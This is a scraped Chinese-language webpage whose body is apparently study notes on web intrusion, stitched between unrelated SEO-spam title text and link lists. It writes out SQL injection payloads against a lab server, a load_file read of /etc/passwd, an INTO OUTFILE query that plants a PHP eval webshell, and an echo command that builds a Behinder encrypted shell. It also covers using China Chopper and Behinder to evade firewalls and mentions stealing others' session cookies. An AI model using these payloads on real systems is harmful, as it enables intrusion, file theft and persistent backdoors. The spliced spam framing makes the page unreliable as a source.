当前位置: 首页 > news >正文

想把自己做的网站放到网上电脑软件推广平台

想把自己做的网站放到网上,电脑软件推广平台,谁告诉你j2ee是做网站的,为网站吸引流量的方法找到了漏洞后,并且上传了木马之后才能使用的两款工具 中国菜刀和冰蝎 想办法获取别人的cookie,cookie中有session-id 一、中国菜刀 1、必须提前已经完成木马植入然后才能使用 2、木马必须是POST请求,参数自定义,在菜刀里给出…

找到了漏洞后,并且上传了木马之后才能使用的两款工具

中国菜刀和冰蝎

想办法获取别人的cookie,cookie中有session-id

一、中国菜刀

1、必须提前已经完成木马植入然后才能使用

2、木马必须是POST请求,参数自定义,在菜刀里给出正确的参数名。

是属于辅助工具,并且菜刀的传输过程是明文传输的,目前已经被WAF进行防护了。

先看是否存在注入点,有下图所示则表示存在注入点==》可以进行接下来的操作

http://192.168.74.133/security/read.php?id=1 and 1=2 union select 1,2,3,4,5,6

有文件,则说明可以读任意路径的文件

http://192.168.74.133/security/read.php?id=1 and 1=2 union select 1,2,3,(select load_file("/etc/passwd")),5,6

写入一句话的木马进行探测,如果嗅探成功后在进行大马的上传

http://192.168.74.133/security/read.php?id=1 and 1=2 union select 1,2,3,"<?php @eval($_POST[a]) ; ?>",5,6 into outfile "/opt/lampp/htdocs/security/temp/mm.php"

在post中写入PHP的代码,a=phpinfo();可以获取你想要的配置信息,也可以用system函数来输入命令

接下来就可以连接菜刀,使用菜刀来连接木马然后就可以查看到服务器里面的东西了

使用wireshark进行抓包用来分析流量

假设菜刀被WAF挡了

二、Behinder冰蝎

冰蝎是加密传输,防火墙很难分析出流量特征,比较容易绕开防火墙。

所以需要先上传一个冰蝎自己的带加密功能的shell脚本,这个上传shell的过程通常有以下几种方式:

1)直接在命令行运行命令,按行用echo 写入

a=system('echo "$post=file_get_contents("php://input");">> /opt/lampp/htdocs/security/temp/muma.php');

http://www.dinnco.com/news/12891.html

相关文章:

  • 购物网站详细设计威海seo
  • 集团公司网站源码php网店代运营骗局
  • 济南机关建设网站怎么做网络广告推广
  • wordpress项目seo搜索引擎优化报价
  • 阿里巴巴网站是用什么技术做的win7优化工具
  • 淘宝客个人网站怎么做百度首页推广广告怎么做
  • 邯郸做wap网站找谁电商的推广方式有哪些
  • 做画册找什么网站小升初最好的补课机构排行榜
  • 服装 公司 网站建设搜索引擎优化的完整过程
  • 个人做的网站有什么危险电商seo是指
  • 网站做推广赚钱项目seo教程自学网
  • 佛山南海网站开发谷歌seo是什么职业
  • 成都网站维护多少钱培训学校加盟
  • 爱做网站软件百度爱采购官方网站
  • 网站建设完成的时间推广技术
  • 网站优化内容有哪些外贸如何做网站推广
  • 武汉网站建设 网站制作优化大师卸载不了
  • 网站上传服务器后台上传资料出错优化培训课程
  • 网站建设一般考虑哪些因素市场营销实际案例
  • 做网站常州青岛seo精灵
  • 怎么做带网站连接的表格搜索引擎优化涉及的内容
  • 全屏网站怎么做如何推广店铺呢
  • 网站正在建设中网站案例
  • 专业营销型网站建设网络公司网站
  • wordpress评论独立搜索引擎优化的各种方法
  • 杭州网站建设及推广seo技术蜘蛛屯
  • 建网站详细步骤河南公司网站建设
  • 网站后台管理系统功能怎么做网络推广最有效
  • 乐山北京网站建设五种常用的网站推广方法
  • 网站界面 欣赏北京计算机培训机构哪个最好